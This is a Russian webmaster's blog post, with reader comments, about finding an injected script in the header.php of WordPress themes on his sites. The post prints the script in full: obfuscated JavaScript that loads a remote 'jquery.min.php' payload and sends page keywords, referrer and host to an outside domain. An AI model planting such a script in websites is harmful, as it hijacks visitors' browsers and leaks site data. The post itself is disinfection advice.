На днях я заметил, что при загрузке нескольких моих сайтов, расположенных на одном хостинге и которые я администрирую, в браузере, в нижнем левом углу после стандартного статуса, например «ожидание nigil.ru…» появляется статус со ссылкой на какой-то сторонний ресурс «ожидание www.domen.com…» (не буду приводить реальный адрес, по понятным причинам).
Вот скриншоты для наглядности:
Загрузка сайта nigil.ru, первая секунда, в статусе загрузки всё в порядке: «Ожидание nigil.ru…»
И вдруг какая-то ссылка на незнакомый ресурс в статусе загрузки: «Ожидание www.domen.com…»
Подобное бывает. Сторонние ссылки в статусе загрузки сайта появляются в браузере например, если у вас установлены какие-то модули или виджеты загружающие информацию для вашего сайта одновременно с ним. Например счётчик посещений, виджет группы Вконтакте или какая либо контекстная реклама, вот как на следующем скриншоте:
В статусе загрузки сайта «Ожидание vk.com…» — у меня на сайте стоит виджет группы Вконтакте.
Да чего только не ставят на сайты со сторонних ресурсов: курс валюты, погода и т.п. Но в данном случае это была ссылка на совершенно левый ресурс, чей-то персональный сайт. Я был уверен, что ничего подобного не устанавливал, тем более сразу на несколько сайтов.
На посторонний сайт не смотря на его загрузку в статусе не переходишь, а загружается изначально запущенный.
Но при этом значительно увеличивалось время загрузки моих сайтов, иногда доходило до 20 секунд! Так же ссылка появлялась при навигации по страницам и записям. Представляете, как это замедляло работу сайтов и к тому же создавало дополнительную нагрузку на сервер.
С этим надо было как-то разобраться.
Необходимо определить местоположение ссылки в коде сайтов и удалить.
Первым делом я просканировал сайты на внешние ссылки специально предназначенной для этого программой Xenu, которая всегда выручала, когда нужно было найти какие-либо ссылки на сайте, но она данной ссылке не смогла обнаружить. Антивирус тоже не помог.
Пришлось вручную копаться в коде. В итоге левую ссылку я обнаружил в файле header.php установленной темы WordpPress на этом сайте. Она была встроена вот в такой скрипт:
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://domen.com/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://domen.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
Так же было и с другими сайтами. Скрипты я удалил. Теперь всё в порядке.
Понятно, для чего этот скрипт внедряют в сайты. Кому не понятно, расскажу свою версию.
Таким образом мошенники в сотни раз могут увеличивать видимую посещаемость своих сайтов, а скорее всего просто зарабатывают на тех наивных владельцах сайтов, которые обращались к ним за раскруткой.
Ведь каждый зашедший на сайт с таким встроенным скриптом в header, одновременно как-бы посещал и другой ресурс ссылка на который была в скрипте, сам того не зная.
Надо отдать должное, схема проста и гениальна.
Ведь если удастся встроить такой скрипт в сайт с посещением скажем в 50 000 уникальных посетителей за сутки, или в сотни сайтов с небольшой посещаемостью (так скорее всего и было в большинстве случаев, а делалось это определённо при помощи роботов), то можно за такое «увеличение посещаемости» запросить хороший гонорар с клиента, который будет доволен любуюсь резко увеличившейся цифрой посещаемости на счётчике сайта.
Только вот при этом довольный клиент никак не будет понимать, почему же при таком обильном количестве «гостей» никто не оставляет комментарии, или не делает покупок и не оставляет заказов. То есть мошенничество в чистом виде.
Да, стоит заметить, что эта проблема коснулось только тех моих сайтов, которые были построены у меня на CMS WordPress, например сайт на движке 1c-bitrix остался не тронутым. При чём скрипт был обнаружен не только в файле header.php активной темы, но и в темах просто закаченных на сайт.
Это, конечно, говорит не в пользу WordPress, а о уязвимости данной CMS.
Обращаюсь к веб-мастерам. Кто-нибудь сталкивался с подобной проблемой? И если нет, проверьте, может в ваши сайты встроен тоже какой-нибудь подобный левый скрипт? Отзовитесь пожалуйста, если есть таковые.
Здаров. Почитай тут. Может что найдешь. http://www.securitynewspaper.com/2015/11/06/jquery-min-php-malware-affects-thousands-of-websites/
Спасибо за полезную ссылку! Жалко только, что там кроме общих стандартных советов по безопасности сайта не приводиться конкретных решений от этой проблемы.
Сам столкнулся …, удалил потом смотрю опять тормозит — а как проблему решать — неужели постоянно ручками?
Я решил проблему таким образом, здесь по ссылке у меня подробно написано: http://nigil.ru/uyazvimost-wordpress-kak-zashhitit-sayt-ot-zarazheniya-vredonosnyim-js-skriptom-s-vneshney-ssyilkoy/
После того как я проделал это со всеми своими сайтами, больше я этих левых js скриптов на них не встречал))
Проблему нашел так ctrl+U Сtrl+F ввожу адрес незнакомый — определяю местоположение и скрипт
Подозреваю это связано с разработчиками темы